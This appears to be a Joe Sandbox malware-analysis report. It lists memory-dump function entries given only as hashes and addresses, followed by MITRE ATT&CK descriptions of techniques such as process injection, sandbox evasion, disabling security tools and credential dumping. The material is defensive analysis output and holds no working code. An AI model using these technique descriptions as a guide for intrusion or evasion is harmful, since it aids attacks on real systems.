Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a4299c757ba88e7f3a185c4d46df04b594f4cf291bafd04f80009b713d63e09
Instruction ID: ed7395717576622930754b36bddbcc4320f366cb3a1f5ccbcd9e0f0b14678699
Opcode Fuzzy Hash: 3a4299c757ba88e7f3a185c4d46df04b594f4cf291bafd04f80009b713d63e09
Instruction Fuzzy Hash: B0D19E74E00318CFDB54DFA9C994BADBBB2BB89301F1081A9D409AB394DB356E85CF54

Function 085B1CF8 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3630db4bc4a17711ea05902c206bdfb83df6dcf43e8562507ddce40da4c81627
Instruction ID: 9fd43aa32ad8199a8e3e060fb5163aef4359efa59b3d5265ff2ca343ab9f9f7b
Opcode Fuzzy Hash: 3630db4bc4a17711ea05902c206bdfb83df6dcf43e8562507ddce40da4c81627
Instruction Fuzzy Hash: DAD19F74E00218CFDB54DFA9C994B9DBBB2BF89301F1081A9D409AB3A4DB356E85CF54

Function 085B0EA0 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a6139c3220b4f1771415f07112f632a20eaf7460ffae971f06dbdccef4f6de1
Instruction ID: 2d0dff0892439a0dab6a58257ce32fcd1ac6ba1efdcb657d32dccf19fdeda7d5
Opcode Fuzzy Hash: 1a6139c3220b4f1771415f07112f632a20eaf7460ffae971f06dbdccef4f6de1
Instruction Fuzzy Hash: B9D19E74E00218CFDB54DFA9D994B9DBBB2BB89301F1081A9D409AB394DB35AE81CF54

Function 085BD440 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3656d738d5274488e23001270695d46770623275e9cb4a2395bb728b3aebd36e
Instruction ID: ca4963799d9fc78206dd3b4c8e6be746bc50023e8c85bacf46eed5ece96f6cde
Opcode Fuzzy Hash: 3656d738d5274488e23001270695d46770623275e9cb4a2395bb728b3aebd36e
Instruction Fuzzy Hash: 4391B274E00218CFDB18DFA9D894BEDBBB2BF88305F248129D415AB3A4DB356946CF54

Function 085BA240 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e78f4417aaaff77c78899be1107e1dbd743ca0991523ba36a48d3f37584ae59f
Instruction ID: 08f25fc371b3029ccedbcf1e08d41aab17ef3be77aa57b4d11044fb5cb5127bc
Opcode Fuzzy Hash: e78f4417aaaff77c78899be1107e1dbd743ca0991523ba36a48d3f37584ae59f
Instruction Fuzzy Hash: 3291B374E00218CFDB19DFA9D894BEDBBB2BF88301F248129D415AB3A4DB356946CF54

Function 085BBE60 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01fce8c56b86078ab30639aa72bb4d9c0b1d9375f49879b374db5af2b764db2f
Instruction ID: 2efb8f49491c95d27e51e381f2bfa6822af969e9626a9b0383b49ff03d7f0eda
Opcode Fuzzy Hash: 01fce8c56b86078ab30639aa72bb4d9c0b1d9375f49879b374db5af2b764db2f
Instruction Fuzzy Hash: AE91B074E00218CFDB18DFA9D894BEDBBB2BF88301F248129D415AB3A4DB356946DF54

Function 085B8C60 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da474184f40382d0d38e05193be88d6bb66d40c08181637fc23cd0baf7ae82
Instruction ID: 389526c49ee6e57098c103543ec1460fd073eb425e9a0f48bc31e63ce8b72ab3
Opcode Fuzzy Hash: 08da474184f40382d0d38e05193be88d6bb66d40c08181637fc23cd0baf7ae82
Instruction Fuzzy Hash: A191B074E00218CFDB18DFA9D894BEDBBB2BF88301F249129D415AB3A4DB356946CF54

Function 085BF060 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abf4eed11ece87290bac0c38aecd85ba8d9708f3c90e9ad73b8bae7e0518387d
Instruction ID: 7747fd0d88367ad2db524a2c2a68dbd8e73872edff3115a8339e1b731d538580
Opcode Fuzzy Hash: abf4eed11ece87290bac0c38aecd85ba8d9708f3c90e9ad73b8bae7e0518387d
Instruction Fuzzy Hash: 9D91A274E00218CFDB14DFA9D894BEDBBB2BF88305F248129D415AB3A4DB356946CF54

Function 085BCE00 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838251beb8c2d144c7858e7cd441aa7257d2565e7073af61b6664dc6bdea8006
Instruction ID: 4b1d4e3b543b4b6e45b7287da904db8b7be37d51c1b7b4da536eb1254a6ea934
Opcode Fuzzy Hash: 838251beb8c2d144c7858e7cd441aa7257d2565e7073af61b6664dc6bdea8006
Instruction Fuzzy Hash: 8F91B274E00218CFDB15DFA9D894BEDBBB2BF88301F248129D415AB3A4EB356946CF54

Function 085B9C00 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8496c02e7427dbe5dbf8b03836c3ae7a29166ebef0e472e3e79aa016ad5532d7
Instruction ID: 845b91aa1605256e80dcbb2dc60689e447fc03391b9755d520a37ce980807cbf
Opcode Fuzzy Hash: 8496c02e7427dbe5dbf8b03836c3ae7a29166ebef0e472e3e79aa016ad5532d7
Instruction Fuzzy Hash: 4D91A274E00218CFDB14DFA9D894BEDBBB2BF88301F248129D415AB3A4EB356946DF54

Function 085BB820 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f015d2329675e69b829e29af765ec681e1161d0c41c616e0a9ab463f3bfdabf
Instruction ID: 405d6e015de105c42719f8eeddd89e305c57bd90aca4b02db6184a6d07af9146
Opcode Fuzzy Hash: 1f015d2329675e69b829e29af765ec681e1161d0c41c616e0a9ab463f3bfdabf
Instruction Fuzzy Hash: C291B174E00218CFDB18DFA9D894BEDBBB2BF88301F248129D415AB3A4DB756946CF54

Function 085BEA20 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a8e415c93ff5e44b62525c7a6fa8ece1fa66bc5f266251f22992db139cb56cc
Instruction ID: 44a2d6c8736f8cb3c668848ec295e2981bf24b6fb03fcdc2a4f751c8022007cc
Opcode Fuzzy Hash: 0a8e415c93ff5e44b62525c7a6fa8ece1fa66bc5f266251f22992db139cb56cc
Instruction Fuzzy Hash: 9091B274E00218CFDB14DFA9D895BEDBBB2BF88301F248129D415AB3A4DB356946CF54

Function 085BE0C0 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4f683f21f19e03b8d8d2b0b9f2b8ceac37f6046f1d5d89ba9340c862191be84
Instruction ID: cdad56a6cf6144d2b3c72fe360fbb8869639831735c7c0e8a254664c15eec397
Opcode Fuzzy Hash: a4f683f21f19e03b8d8d2b0b9f2b8ceac37f6046f1d5d89ba9340c862191be84
Instruction Fuzzy Hash: 0091C074E00218CFDB18DFA9D895BEDBBB2BF88301F248129D415AB3A4DB356946CF54

Function 085BAEC0 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82e12118ff5b7041e941c9b8d2cc0e24d58e7413fd62472f162aba409aebce84
Instruction ID: e02834db396172d52e364f57700831752383eb8933ca0ed453013e362e14d47d
Opcode Fuzzy Hash: 82e12118ff5b7041e941c9b8d2cc0e24d58e7413fd62472f162aba409aebce84
Instruction Fuzzy Hash: BC91B274E00218CFDB15DFA9D894BEDBBB2BF88301F248129D415AB3A4DB356946CF54

Function 085BCAE0 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04a839f7721ff9906734d1bc8a4ca641d069f397cc8dcdb89139acae31b42dc2
Instruction ID: 5a6d7c284f815649c439e6e106bb4a826d2559bf16b4b6d68502fd019a062aad
Opcode Fuzzy Hash: 04a839f7721ff9906734d1bc8a4ca641d069f397cc8dcdb89139acae31b42dc2
Instruction Fuzzy Hash: A691D278E00258CFDB14DFA9D894BEDBBB2BF88300F248169D405AB3A4DB356946CF54

Function 085B98E0 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99bb58489040ddfb28ead128deafe4c23f8fda2735bc669821328bf7d1442570
Instruction ID: 10dc622954935c0d91cecd0cb23e35d80a8ecc9149c426c06c3ea1d5417128b1
Opcode Fuzzy Hash: 99bb58489040ddfb28ead128deafe4c23f8fda2735bc669821328bf7d1442570
Instruction Fuzzy Hash: BE91A274E00218CFDB14DFA9D894BEDBBB2BF88301F248129D415AB3A4EB356946DF54

Function 085BDA80 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb842a868ca9b20511f27bb5a6b40f9b28bf478b3f3b80f73a36d09d4bf27607
Instruction ID: 13d2b52c329cb81ffe9b5e80e4c6f644c2ebcf9879eae2a62f81556ed76f0454
Opcode Fuzzy Hash: bb842a868ca9b20511f27bb5a6b40f9b28bf478b3f3b80f73a36d09d4bf27607
Instruction Fuzzy Hash: 8391A074E00218CFDB18DFA9D894BEDBBB2BF88301F248169D415AB3A4DB356946CF54

Function 085BA880 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45d9e83a6aa9ead50e2d56c39e69de8a9a36592068d3c26b2a40ff5011a65504
Instruction ID: 5194af18b63dd7b71d0850c48443ae1f4b0c034cde5ebda72123391114fd1075
Opcode Fuzzy Hash: 45d9e83a6aa9ead50e2d56c39e69de8a9a36592068d3c26b2a40ff5011a65504
Instruction Fuzzy Hash: B391C174E00218CFDB19DFA9D894BEDBBB2BF88300F248129D415AB3A4DB356946DF54

Function 085BF6A8 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d772f6dd00e5bb508311cbcf2f624534aa78939659d1c46ca70940e158f1323d
Instruction ID: 21fab7f0c4af945c6abde0caab67591eb5d4cad3fa8c1f18a41d4b1e6c71bcd3
Opcode Fuzzy Hash: d772f6dd00e5bb508311cbcf2f624534aa78939659d1c46ca70940e158f1323d
Instruction Fuzzy Hash: 9E91B074E00218CFDB18DFA9D894BEDBBB2BF88301F248129D415AB3A4DB356946CF54

Function 085BC4A0 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 247e48195df0ddb1999403a1a5699845164c0fa16f5d573a60ccb48d46134a8c
Instruction ID: 364af933e1b7e45af0ff0629dbafb30615e08288266f95dfe1477d447795aaf4
Opcode Fuzzy Hash: 247e48195df0ddb1999403a1a5699845164c0fa16f5d573a60ccb48d46134a8c
Instruction Fuzzy Hash: 8491B174E00218CBDB14DFA9D894BEDBBB2BF88301F248129D415AB3A4DB356946CF54

Function 085B92A0 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50263ed744aebb8a3f8127e5b881f20f8764920a19b41cae2809a7fc88f3392f
Instruction ID: f1080ac51ad461db72d673b315bc74bf607b9962d3988738e932087a956f324c
Opcode Fuzzy Hash: 50263ed744aebb8a3f8127e5b881f20f8764920a19b41cae2809a7fc88f3392f
Instruction Fuzzy Hash: 6F91A174E00218CFDB14DFA9D894BEDBBB2BF88301F248129D415AB3A4EB356946CF54

Function 085BBB40 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a06dd50d617ac3da468f5a7bf6e06363ec2aa926316c3c064d21b3bb3e49928b
Instruction ID: f4325ab67b191a7da0c560168576dc4fa17846e4a2cc72b565f5b5f878593f21
Opcode Fuzzy Hash: a06dd50d617ac3da468f5a7bf6e06363ec2aa926316c3c064d21b3bb3e49928b
Instruction Fuzzy Hash: FA91C174E00218CFDB18DFA9D894BEDBBB2BF88301F248129D405AB3A4DB756946CF54

Function 085BED40 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94ee3087e9b74d5210fd31ab98dc5e423a6c2634209175587592403092e991fd
Instruction ID: 4485b9c09901575362a13b3ced598108337a3cc084dc8cdcd4a06313ead16ba2
Opcode Fuzzy Hash: 94ee3087e9b74d5210fd31ab98dc5e423a6c2634209175587592403092e991fd
Instruction Fuzzy Hash: FD91D274E00218CFDB14DFA9D895BEDBBB2BF88301F248129E405AB3A4DB356946CF54

Function 085B0006 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b78165565ba0451c20682ded3f896022fd3ef8b69a43bb6cf804c248132497b9
Instruction ID: ac6f312c876007ff992fa0da990d25c1ba629bf95b94b5414f262ff59dd3a7d0
Opcode Fuzzy Hash: b78165565ba0451c20682ded3f896022fd3ef8b69a43bb6cf804c248132497b9
Instruction Fuzzy Hash: 6741F874D052488FDB15DFBAD85069EBFF2BF8A300F14C0AAC458AB2A2DB355945CF51

Function 085B1358 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f8dad9e7eb9dd0cab5b9cc952a9a2495b60c75c1fe88deaea2aa0a8c81025ee
Instruction ID: 8b13fbf48065e66ac08f695aa83f0a8c6b798b7ec851e16db2268fa57fca1ae6
Opcode Fuzzy Hash: 8f8dad9e7eb9dd0cab5b9cc952a9a2495b60c75c1fe88deaea2aa0a8c81025ee
Instruction Fuzzy Hash: 6A41F374E00608CBDB58DFAAD8547EEBBF2BF89300F14C06AD418AB255DB355946CF50

Function 085B1CEA Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d832dd86108252fa2f6873c97c5c09bf8913fb8c16bace806053dfe55cdea1fa
Instruction ID: 1987946fad74c2bc21d52f65e9f4c9a86e8da668b5197e154bbc48c49d058267
Opcode Fuzzy Hash: d832dd86108252fa2f6873c97c5c09bf8913fb8c16bace806053dfe55cdea1fa
Instruction Fuzzy Hash: 6241E374E006188BDB58DFAAD9547EEBBF2BF89300F24D06AC418BB265DB345906CF50

Function 085B04F8 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ec4d5b8da11937af83d8fa9d04c795c3e60659c6023a89de3ec21c423cd2b52
Instruction ID: ab8323cd0f21f2424471c7aa9a4e0e61c96fd6b9db93dba422364f00c0ce126c
Opcode Fuzzy Hash: 7ec4d5b8da11937af83d8fa9d04c795c3e60659c6023a89de3ec21c423cd2b52
Instruction Fuzzy Hash: E941B2B4D006188BEB18DFAAD9547EEBBF2BF89301F14D02AC418AB294DB345906CF50

Function 085B0E91 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e81a58f0ab326b125d91306e4f4187d52912909a7fc7c51fd98e96b594bea5b6
Instruction ID: ea30a5295ef5af662798c6ae29d0788115da483175e1c3c3b69890340cceeace
Opcode Fuzzy Hash: e81a58f0ab326b125d91306e4f4187d52912909a7fc7c51fd98e96b594bea5b6
Instruction Fuzzy Hash: 2B41E374E006088BDB58DFAAD9547DEBBF2BF89301F14C06AD418BB294EB345906CF50

Function 085B1821 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abce90e9fab5dde86250c67766bf37b0fdbb40e2f608b87b8823bdbe6d2081e0
Instruction ID: 93f21fe0fa529324df9f046ae5f0fc49c4debb9ef4147209becf20d2c2e90c69
Opcode Fuzzy Hash: abce90e9fab5dde86250c67766bf37b0fdbb40e2f608b87b8823bdbe6d2081e0
Instruction Fuzzy Hash: 0441DFB4E00608CBDB58DFAAD9547EEBBF2BF89301F14C02AD418AB294DB345946CF54

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
